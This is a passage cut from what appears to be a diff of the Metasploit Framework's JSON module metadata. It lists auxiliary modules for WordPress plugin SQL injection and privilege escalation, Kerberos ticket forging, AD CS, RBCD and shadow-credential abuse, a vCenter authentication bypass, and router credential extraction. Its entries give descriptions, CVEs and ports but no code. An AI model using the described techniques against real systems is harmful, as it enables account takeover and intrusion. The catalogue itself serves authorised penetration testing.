8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_gdpr_compliance_privesc", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [], + "Reliability": [], + "SideEffects": [ + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_google_maps_sqli": { + "name": "WordPress Google Maps Plugin SQL Injection", + "fullname": "auxiliary/admin/http/wp_google_maps_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-04-02", + "type": "auxiliary", + "author": [ + "Thomas Chauchefoin (Synacktiv)" + ], + "description": "This module exploits a SQL injection vulnerability in a REST endpoint\n registered by the WordPress plugin wp-google-maps between 7.11.00 and\n 7.11.17 (included).\n\n As the table prefix can be changed by administrators, set DB_PREFIX\n accordingly.", + "references": [ + "CVE-2019-10692", + "WPVDB-9249" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/wp_google_maps_sqli.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_google_maps_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_masterstudy_privesc": { + "name": "Wordpress MasterStudy Admin Account Creation", + "fullname": "auxiliary/admin/http/wp_masterstudy_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-02-18", + "type": "auxiliary", + "author": [ + "h00die", + "Numan Türle" + ], + "description": "MasterStudy LMS, a WordPress plugin,\n prior to 2.7.6 is affected by a privilege escalation where an unauthenticated\n user is able to create an administrator account for wordpress itself.", + "references": [ + "CVE-2022-0441", + "URL-https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6", + "EDB-50752", + "WPVDB-173c2efe-ee9c-4539-852f-c242b4f728ed" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-10-13 10:13:27 +0000", + "path": "/modules/auxiliary/admin/http/wp_masterstudy_privesc.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_masterstudy_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_post_smtp_acct_takeover": { + "name": "Wordpress POST SMTP Account Takeover", + "fullname": "auxiliary/admin/http/wp_post_smtp_acct_takeover", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-01-10", + "type": "auxiliary", + "author": [ + "h00die", + "Ulysses Saicha" + ], + "description": "The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege\n escalation where an unauthenticated user is able to reset the password\n of an arbitrary user. This is done by requesting a password reset, then\n viewing the latest email logs to find the associated password reset email.", + "references": [ + "CVE-2023-6875", + "URL-https://github.com/UlyssesSaicha/CVE-2023-6875/tree/main" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-11-28 13:18:47 +0000", + "path": "/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_post_smtp_acct_takeover", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_symposium_sql_injection": { + "name": "WordPress Symposium Plugin SQL Injection", + "fullname": "auxiliary/admin/http/wp_symposium_sql_injection", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-08-18", + "type": "auxiliary", + "author": [ + "PizzaHatHacker", + "Matteo Cantoni " + ], + "description": "This module exploits a SQL injection vulnerability in the WP Symposium plugin\n before 15.8 for WordPress, which allows remote attackers to extract credentials\n via the size parameter to get_album_item.php.", + "references": [ + "CVE-2015-6522", + "EDB-37824" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_symposium_sql_injection", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_wplms_privilege_escalation": { + "name": "WordPress WPLMS Theme Privilege Escalation", + "fullname": "auxiliary/admin/http/wp_wplms_privilege_escalation", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-02-09", + "type": "auxiliary", + "author": [ + "Evex", + "rastating" + ], + "description": "The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an\n authenticated user of any user level to set any system option due to a lack of\n validation in the import_data function of /includes/func.php.\n\n The module first changes the admin e-mail address to prevent any\n notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default\n role to be administrator. This will allow for the user to create a new account\n with admin privileges via the default registration page found at\n /wp-login.php?action=register.", + "references": [ + "WPVDB-7785" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_wplms_privilege_escalation", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/zyxel_admin_password_extractor": { + "name": "ZyXEL GS1510-16 Password Extractor", + "fullname": "auxiliary/admin/http/zyxel_admin_password_extractor", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Daniel Manser", + "Sven Vetsch" + ], + "description": "This module exploits a vulnerability in ZyXEL GS1510-16 routers\n to extract the admin password. Due to a lack of authentication on the\n webctrl.cgi script, unauthenticated attackers can recover the\n administrator password for these devices. The vulnerable device\n has reached end of life for support from the manufacturer, so it is\n unlikely this problem will be addressed.", + "references": [ + "URL-https://github.com/rapid7/metasploit-framework/pull/2709" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb", + "is_install_path": true, + "ref_name": "admin/http/zyxel_admin_password_extractor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/kerberos/forge_ticket": { + "name": "Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging", + "fullname": "auxiliary/admin/kerberos/forge_ticket", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Benjamin Delpy", + "Dean Welch", + "alanfoster", + "smashery" + ], + "description": "This module forges a Kerberos ticket. Four different techniques can be used:\n - Silver ticket: Using a service account hash, craft a ticket impersonating any user and privileges to that account.\n - Golden ticket: Using the krbtgt hash, craft a ticket impersonating any user and privileges.\n - Diamond ticket: Authenticate to the domain controller, and using the krbtgt hash, copy the PAC from the authenticated user to a forged ticket.\n - Sapphire ticket: Use the S4U2Self+U2U trick to retrieve the PAC of another user, then use the krbtgt hash to craft a forged ticket.", + "references": [ + "URL-https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it" + ], + "platform": "", + "arch": "", + "rport": 88, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-11-28 13:14:13 +0000", + "path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb", + "is_install_path": true, + "ref_name": "admin/kerberos/forge_ticket", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [], + "AKA": [ + "Ticketer", + "Klist" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "FORGE_DIAMOND", + "description": "Forge a Diamond Ticket" + }, + { + "name": "FORGE_GOLDEN", + "description": "Forge a Golden Ticket" + }, + { + "name": "FORGE_SAPPHIRE", + "description": "Forge a Sapphire Ticket" + }, + { + "name": "FORGE_SILVER", + "description": "Forge a Silver Ticket" + } + ] + }, + "auxiliary_admin/kerberos/get_ticket": { + "name": "Kerberos TGT/TGS Ticket Requester", + "fullname": "auxiliary/admin/kerberos/get_ticket", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Christophe De La Fuente", + "Spencer McIntyre", + "Will Schroeder", + "Lee Christensen", + "Oliver Lyak", + "smashery" + ], + "description": "This module requests TGT/TGS Kerberos tickets from the KDC", + "references": [], + "platform": "", + "arch": "", + "rport": 88, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-01-29 14:25:33 +0000", + "path": "/modules/auxiliary/admin/kerberos/get_ticket.rb", + "is_install_path": true, + "ref_name": "admin/kerberos/get_ticket", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "getTGT", + "getST" + ], + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "GET_HASH", + "description": "Request a TGS to recover the NTLM hash" + }, + { + "name": "GET_TGS", + "description": "Request a Ticket-Granting-Service (TGS)" + }, + { + "name": "GET_TGT", + "description": "Request a Ticket-Granting-Ticket (TGT)" + } + ] + }, + "auxiliary_admin/kerberos/inspect_ticket": { + "name": "Kerberos Ticket Inspecting", + "fullname": "auxiliary/admin/kerberos/inspect_ticket", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Dean Welch" + ], + "description": "This module outputs the contents of a ccache/kirbi file and optionally (when provided with the appropriate key)\n decrypts and displays the encrypted content too.\n Can be used for inspecting tickets that aren't working as intended in an effort to debug them.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-01-26 09:21:55 +0000", + "path": "/modules/auxiliary/admin/kerberos/inspect_ticket.rb", + "is_install_path": true, + "ref_name": "admin/kerberos/inspect_ticket", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [], + "AKA": [ + "klist" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/kerberos/keytab": { + "name": "Kerberos keytab utilities", + "fullname": "auxiliary/admin/kerberos/keytab", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "alanfoster" + ], + "description": "Utilities for interacting with keytab files, which can store the hashed passwords of one or\n more principals.\n\n Discovered keytab files can be used to generate Kerberos Ticket Granting Tickets, or bruteforced\n offline.\n\n Keytab files can be also useful for decrypting Kerberos traffic using Wireshark dissectors,\n including the krbtgt encrypted blobs if the AES password hash is used.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-06-13 09:14:06 +0000", + "path": "/modules/auxiliary/admin/kerberos/keytab.rb", + "is_install_path": true, + "ref_name": "admin/kerberos/keytab", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "ADD", + "description": "Add a new entry to the keytab file" + }, + { + "name": "EXPORT", + "description": "Export the current database creds to the keytab file" + }, + { + "name": "LIST", + "description": "List the entries in the keytab file" + } + ] + }, + "auxiliary_admin/kerberos/ms14_068_kerberos_checksum": { + "name": "MS14-068 Microsoft Kerberos Checksum Validation Vulnerability", + "fullname": "auxiliary/admin/kerberos/ms14_068_kerberos_checksum", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-11-18", + "type": "auxiliary", + "author": [ + "Tom Maddock", + "Sylvain Monne", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem\n exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS\n request, where a domain user may forge a PAC with arbitrary privileges, including\n Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to\n a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with the Mimikatz\n help. It has been tested successfully on Windows 2008.", + "references": [ + "CVE-2014-6324", + "MSB-MS14-068", + "OSVDB-114751", + "URL-http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx", + "URL-https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/", + "URL-http://web.archive.org/web/20180107213459/https://github.com/bidord/pykek", + "URL-https://www.rapid7.com/blog/post/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit" + ], + "platform": "", + "arch": "", + "rport": 88, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb", + "is_install_path": true, + "ref_name": "admin/kerberos/ms14_068_kerberos_checksum", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/kerberos/ticket_converter": { + "name": "Kerberos ticket converter", + "fullname": "auxiliary/admin/kerberos/ticket_converter", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Zer1t0", + "Dean Welch" + ], + "description": "This module converts tickets to the ccache format from the kirbi format and vice versa.", + "references": [ + "URL-https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/ticketConverter.py", + "URL-https://tools.ietf.org/html/rfc4120", + "URL-http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html", + "URL-https://github.com/gentilkiwi/kekeo", + "URL-https://github.com/rvazarkar/KrbCredExport" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-09-28 22:28:54 +0000", + "path": "/modules/auxiliary/admin/kerberos/ticket_converter.rb", + "is_install_path": true, + "ref_name": "admin/kerberos/ticket_converter", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "Reliability": [], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/ldap/ad_cs_cert_template": { + "name": "AD CS Certificate Template Management", + "fullname": "auxiliary/admin/ldap/ad_cs_cert_template", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Will Schroeder", + "Lee Christensen", + "Oliver Lyak", + "Spencer McIntyre" + ], + "description": "This module can create, read, update, and delete AD CS certificate templates from a Active Directory Domain\n Controller.\n\n The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be\n restored using the CREATE or UPDATE actions. The CREATE and UPDATE actions require a certificate template data\n file to be specified to define the attributes. Template data files are provided to create a template that is\n vulnerable to ESC1, ESC2, ESC3 and ESC15.\n\n This module is capable of exploiting ESC4.", + "references": [ + "URL-https://github.com/GhostPack/Certify", + "URL-https://github.com/ly4k/Certipy" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-13 16:46:31 +0000", + "path": "/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb", + "is_install_path": true, + "ref_name": "admin/ldap/ad_cs_cert_template", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [ + "config-changes" + ], + "Reliability": [], + "AKA": [ + "Certifry", + "Certipy" + ] + }, + "session_types": [ + "ldap" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "CREATE", + "description": "Create the certificate template" + }, + { + "name": "DELETE", + "description": "Delete the certificate template" + }, + { + "name": "READ", + "description": "Read the certificate template" + }, + { + "name": "UPDATE", + "description": "Modify the certificate template" + } + ] + }, + "auxiliary_admin/ldap/change_password": { + "name": "Change Password", + "fullname": "auxiliary/admin/ldap/change_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "smashery" + ], + "description": "This module allows Active Directory users to change their own passwords, or reset passwords for\n accounts they have privileges over.", + "references": [ + "URL-https://github.com/fortra/impacket/blob/master/examples/changepasswd.py", + "URL-https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/6e803168-f140-4d23-b2d3-c3a8ab5917d2" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-12-06 16:47:25 +0000", + "path": "/modules/auxiliary/admin/ldap/change_password.rb", + "is_install_path": true, + "ref_name": "admin/ldap/change_password", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "ldap" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "CHANGE", + "description": "Change the user's password, knowing the existing password" + }, + { + "name": "RESET", + "description": "Reset a target user's password, having permissions over their account" + } + ] + }, + "auxiliary_admin/ldap/rbcd": { + "name": "Role Base Constrained Delegation", + "fullname": "auxiliary/admin/ldap/rbcd", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Podalirius", + "Charlie Bromberg", + "Spencer McIntyre" + ], + "description": "This module can read and write the necessary LDAP attributes to configure a particular object for Role Based\n Constrained Delegation (RBCD). When writing, the module will add an access control entry to allow the account\n specified in DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the\n authenticated user must have write access to the target object (the object specified in DELEGATE_TO).", + "references": [ + "URL-https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution", + "URL-https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd", + "URL-https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/rbcd.py" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-13 16:46:31 +0000", + "path": "/modules/auxiliary/admin/ldap/rbcd.rb", + "is_install_path": true, + "ref_name": "admin/ldap/rbcd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "ldap" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "FLUSH", + "description": "Delete the security descriptor" + }, + { + "name": "READ", + "description": "Read the security descriptor" + }, + { + "name": "REMOVE", + "description": "Remove matching ACEs from the security descriptor DACL" + }, + { + "name": "WRITE", + "description": "Add an ACE to the security descriptor DACL" + } + ] + }, + "auxiliary_admin/ldap/shadow_credentials": { + "name": "Shadow Credentials", + "fullname": "auxiliary/admin/ldap/shadow_credentials", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Elad Shamir", + "smashery" + ], + "description": "This module can read and write the necessary LDAP attributes to configure a particular account with a\n Key Credential Link. This allows weaponising write access to a user account by adding a certificate\n that can subsequently be used to authenticate. In order for this to succeed, the authenticated user\n must have write access to the target object (the object specified in TARGET_USER).", + "references": [ + "URL-https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab", + "URL-https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-05-02 13:57:13 +0000", + "path": "/modules/auxiliary/admin/ldap/shadow_credentials.rb", + "is_install_path": true, + "ref_name": "admin/ldap/shadow_credentials", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "ldap" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "ADD", + "description": "Add a credential to the account" + }, + { + "name": "FLUSH", + "description": "Delete all certificate entries" + }, + { + "name": "LIST", + "description": "Read all credentials associated with the account" + }, + { + "name": "REMOVE", + "description": "Remove matching certificate entries from the account object" + } + ] + }, + "auxiliary_admin/ldap/vmware_vcenter_vmdir_auth_bypass": { + "name": "VMware vCenter Server vmdir Authentication Bypass", + "fullname": "auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-04-09", + "type": "auxiliary", + "author": [ + "Hynek Petrak", + "JJ Lehmann", + "Ofri Ziv", + "wvu " + ], + "description": "This module bypasses LDAP authentication in VMware vCenter Server's\n vmdir service to add an arbitrary administrator user. Version 6.7\n prior to the 6.7U3f update is vulnerable, only if upgraded from a\n previous release line, such as 6.0 or 6.5.\n Note that it is also possible to provide a bind username and password\n to authenticate if the target is not vulnerable. It will add an\n arbitrary administrator user the same way.", + "references": [ + "CVE-2020-3952", + "URL-https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/", + "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html", + "URL-https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md" + ], + "platform": "", + "arch": "", + "rport": 636, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-05-02 13:57:13 +0000", + "path": "/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/ldap/vmware_vcenter_vmdir_auth_bypass", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "ldap" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "Add", + "description": "Add an admin user" + } + ] + }, + "auxiliary_admin/maxdb/maxdb_cons_exec": { + "name": "SAP MaxDB cons.exe Remote Command Injection", + "fullname": "auxiliary/admin/maxdb/maxdb_cons_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-01-09", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "SAP MaxDB is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.", + "references": [ + "OSVDB-40210", + "BID-27206", + "CVE-2008-0244" + ], + "platform": "", + "arch": "", + "rport": 7210, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb", + "is_install_path": true, + "ref_name": "admin/maxdb/maxdb_cons_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/misc/sercomm_dump_config": { + "name": "SerComm Device Configuration Dump", + "fullname": "auxiliary/admin/misc/sercomm_dump_config", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-12-31", + "type": "auxiliary", + "author": [ + "Eloi Vanderbeken ", + "Matt \"hostess\" Andreko " + ], + "description": "This module will dump the configuration of several SerComm devices. These devices\n typically include routers from NetGear and Linksys. This module was tested\n successfully against the NetGear DG834 series ADSL modem router.", + "references": [ + "OSVDB-101653", + "URL-https://github.com/elvanderb/TCP-32764" + ], + "platform": "", + "arch": "", + "rport": 32764, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/misc/sercomm_dump_config.rb", + "is_install_path": true, + "ref_name": "admin/misc/sercomm_dump_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/misc/wol": { + "name": "UDP Wake-On-Lan (WOL)", + "fullname": "auxiliary/admin/misc/wol", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "sinn3r " + ], + "description": "This module will turn on a remote machine with a network card that\n supports wake-on-lan (or MagicPacket). In order to use this, you must\n know the machine's MAC address in advance. The current default MAC\n address is just an example of how your input should look like.\n\n The password field is optional. If present, it should be in this hex\n format: 001122334455, which is translated to \"0x001122334455\" in binary.\n Note that this should be either 4 or 6 bytes long.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2019-03-05 04:43:37 +0000", + "path": "/modules/auxiliary/admin/misc/wol.rb", + "is_install_path": true, + "ref_name": "admin/misc/wol", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/motorola/wr850g_cred": { + "name": "Motorola WR850G v4.03 Credentials", + "fullname": "auxiliary/admin/motorola/wr850g_cred", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-09-24", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "Login credentials to the Motorola WR850G router with\n firmware v4.03 can be obtained via a simple GET request\n if issued while the administrator is logged in. A lot\n more information is available through this request, but\n you can get it all and more after logging in.", + "references": [ + "CVE-2004-1550", + "OSVDB-10232", + "URL-https://seclists.org/bugtraq/2004/Sep/0339.html" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/motorola/wr850g_cred.rb", + "is_install_path": true, + "ref_name": "admin/motorola/wr850g_cred", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/ms/ms08_059_his2006": { + "name": "Microsoft Host Integration Server 2006 Command Execution Vulnerability", + "fullname": "auxiliary/admin/ms/ms08_059_his2006", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-14", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.", + "references": [ + "MSB-MS08-059", + "CVE-2008-3466", + "OSVDB-49068", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745" + ], + "platform": "", + "arch": "", + "rport": 0, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/ms/ms08_059_his2006.rb", + "is_install_path": true, + "ref_name": "admin/ms/ms08_059_his2006", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_enum": { + "name": "Microsoft SQL Server Configuration Enumerator", + "fullname": "auxiliary/admin/mssql/mssql_enum", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Carlos Perez " + ], + "description": "This module will perform a series of configuration audits and\n security checks against a Microsoft SQL Server database. For this\n module to work, valid administrative user credentials must be\n supplied.", + "references": [], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_enum.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_enum", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_enum_domain_accounts": { + "name": "Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration", + "fullname": "auxiliary/admin/mssql/mssql_enum_domain_accounts", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind ", + "antti " + ], + "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function. This is similar to the smb_lookupsid module, but executed\n through SQL Server queries as any user with the PUBLIC role (everyone). Information that\n can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated\n accounts can then be used in online dictionary attacks.", + "references": [ + "URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql" + ], + "platform": "", + "arch": "", + "rport": 